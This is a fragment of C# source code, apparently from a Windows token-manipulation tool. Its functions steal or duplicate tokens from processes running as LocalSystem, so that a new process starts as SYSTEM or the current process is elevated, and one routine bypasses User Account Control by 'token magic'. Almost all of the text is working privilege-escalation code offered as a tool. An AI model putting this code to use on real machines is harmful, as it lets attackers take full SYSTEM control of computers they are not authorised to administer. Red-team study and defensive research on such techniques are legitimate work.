//////////////////////////////////////////////////////////////////////////////// // Creates a new process as SYSTEM //////////////////////////////////////////////////////////////////////////////// public bool GetSystem(string newProcess) { SecurityIdentifier securityIdentifier = new SecurityIdentifier(WellKnownSidType.LocalSystemSid, null); NTAccount systemAccount = (NTAccount)securityIdentifier.Translate(typeof(NTAccount)); Console.WriteLine("[*] Searching for {0}", systemAccount.ToString()); processes = UserSessions.EnumerateUserProcesses(false, systemAccount.ToString()); foreach (uint process in processes.Keys) { if (OpenProcessToken((int)process)) { Console.WriteLine(" [+] Opened {0}", process); SetWorkingTokenToRemote(); if (DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation)) { SetWorkingTokenToNewToken(); if (StartProcessAsUser(newProcess)) { return(true); } } } } Misc.GetWin32Error("GetSystem"); return(false); }
//////////////////////////////////////////////////////////////////////////////// // Use Native APIs to find processes that a user is running //////////////////////////////////////////////////////////////////////////////// private static void _FindUserProcesses(CommandLineParsing cLP) { string user; if (!cLP.GetData("username", out user)) { Console.WriteLine("[-] Username not specified"); return; } Dictionary <uint, string> processes = UserSessions.EnumerateUserProcesses(false, user); Console.WriteLine("{0,-30}{1,-30}", "Process ID", "Process Name"); Console.WriteLine("{0,-30}{1,-30}", "----------", "------------"); foreach (uint pid in processes.Keys) { Console.WriteLine("{0,-30}{1,-30}", pid, processes[pid]); } }
//////////////////////////////////////////////////////////////////////////////// // Elevates current process to SYSTEM //////////////////////////////////////////////////////////////////////////////// public bool GetSystem() { SecurityIdentifier securityIdentifier = new SecurityIdentifier(WellKnownSidType.LocalSystemSid, null); NTAccount systemAccount = (NTAccount)securityIdentifier.Translate(typeof(NTAccount)); Console.WriteLine("[*] Searching for {0}", systemAccount.ToString()); processes = UserSessions.EnumerateUserProcesses(false, systemAccount.ToString()); foreach (uint process in processes.Keys) { if (OpenProcessToken((int)process)) { Console.WriteLine(" [+] Opened {0}", process); SetWorkingTokenToRemote(); if (ImpersonateUser()) { return(true); } } } return(false); }
//////////////////////////////////////////////////////////////////////////////// // UAC Token Magic - Deprecated //////////////////////////////////////////////////////////////////////////////// private static void _BypassUAC(CommandLineParsing cLP, IntPtr hToken) { Console.WriteLine("[*] Notice: This no longer working on versions of Windows 10 > 1703"); if (cLP.Remote) { using (RestrictedToken rt = new RestrictedToken(hToken)) { rt.BypassUAC(cLP.ProcessID, cLP.Command); } } else { string name = WindowsIdentity.GetCurrent().Name; Dictionary <uint, string> uacUsers = UserSessions.EnumerateUserProcesses(true, name); foreach (uint pid in uacUsers.Keys) { Console.WriteLine("\n[*] Attempting Bypass with PID {0} ({1})", pid, uacUsers[pid]); using (RestrictedToken rt = new RestrictedToken(hToken)) { rt.BypassUAC((int)pid, cLP.Command); } } } }